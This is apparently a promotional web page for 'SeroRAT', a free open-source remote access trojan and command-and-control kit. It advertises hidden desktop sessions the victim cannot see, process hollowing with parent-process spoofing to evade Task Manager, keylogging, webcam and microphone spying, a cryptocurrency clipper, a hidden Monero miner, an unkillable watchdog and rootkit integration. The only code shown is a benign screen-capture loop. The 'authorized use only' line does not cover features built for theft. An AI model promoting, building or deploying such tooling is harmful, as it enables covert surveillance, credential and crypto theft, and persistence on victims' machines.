Open source · MIT License · Authorized use only

The C2 they charge
$2,000 for.
Free.

HVNC, DXGI remote desktop at 60fps, remote webcam via DirectShow, process hollowing with PPID spoof, NativeAOT stub — 40+ features. Everything the expensive ones have. None of the price tag.

View on GitHub Screenshots

7 MB stub· 40+ features· AES-256· .NET 10 NativeAOT

Hidden Virtual Network Computing

HVNC creates a completely isolated Windows desktop session — invisible to the target. Chrome, Firefox, Edge, Brave, Opera launch directly into the shadow session. The victim sees nothing. You see everything.

Each browser gets --start-maximized and fills the HVNC frame. Mouse and keyboard are forwarded with sub-pixel accuracy. The clipboard syncs on a 400ms toggle you control.

isolated desktop9 browsersclipboard syncreal-time input

Process Hollowing — RunPE

The injected binary never touches disk. A legitimate host process (svchost, dllhost) is created suspended, its memory unmapped, and your payload written in its place — then resumed.

PPID spoofing via UpdateProcThreadAttribute makes the injected process appear as a child of explorer.exe or winlogon.exe. Task Manager, Process Explorer — they see nothing suspicious.

no disk writePPID spoofsuspended creatememory remap

Open source

Server — WPF C#
Stub — NativeAOT x64
Builder
All 40+ features
TLS protocol

Private / yours to build

Polymorphic crypter private
UAC bypass chain private
Rootkit integration implement yourself

The rootkit is documented in the stub code and works — wire it in your own build.

What it does.

Monitoring

Remote Desktop — DXGI + GDI fallback
HVNC — isolated hidden desktop
Webcam — DirectShow + VFW
Microphone — live listen + WAV save
Keylogger — disk logging by date
Performance Monitor — CPU / RAM / Net
Remote Shell — cmd / PowerShell

Administration

File Manager — browse / upload / exec
Process Manager — tree view, icons
Registry Editor — HKLM + HKCU
Service / Window / Device Manager
TCP Connections + firewall rules
Startup Manager
Installed Programs — silent uninstall

Offensive

RunPE — in-memory + PPID spoof
Reverse SOCKS5 proxy
Crypto Clipper — 10 coins
AutoTask DLL plugins — C++, compiled on demand
XMR Miner — configurable hollow target, idle throttle
Telegram first-exec notification
Per-HWID AutoTask deduplication

The market.

What others charge for the same thing — often worse, and closed to inspect.

Cobalt Strike	$5,000 / yr	commercial, closed source
Brute Ratel	$2,500 / yr	commercial, closed source
PureRAT	$2,000 lifetime	reversed & leaked anyway
SeroRAT	$0 — open source	MIT, full source on GitHub

No shortcuts.

The details that separate a demo from something you'd actually deploy.

TLS 1.2+ with certificate pinning
Shared-key auth on every packet. 3s heartbeat with RTT measurement. Multi-host auto-reconnect with configurable round-robin delay.
PPID spoofing in RunPE
UpdateProcThreadAttribute sets the injected process parent to explorer.exe or winlogon.exe depending on elevation level.
Watchdog that can't be killed
4 guardian processes in dllhost/SearchProtocolHost, staggered 800ms apart. File lock + FileSystemWatcher for instant restore.

RemoteDesktopFeature.cs

// DXGI Desktop Duplication — GPU direct
DxgiCapture.TryInit(monitorIndex);

while (_running)
{
    // Block on VBLANK — natural 60fps pacing
    var pixels = DxgiCapture.CaptureFrame(
        out w, out h, timeout: 16);

    // 64×64 block diff vs previous frame
    var changed = BlockDiff(pixels, _prev, w, h);
    if (changed.Count == 0) continue;

    await SendDeltaAsync(changed, quality);
    _prev = pixels;
}

Open source.
No strings.

Fork it. Build on it. Make it yours.
Just use it on systems you have authorization for.

Clone on GitHub

For authorized use only — red team engagements, security research, CTF. You are responsible for where you point it.

The C2 they charge$2,000 for.Free.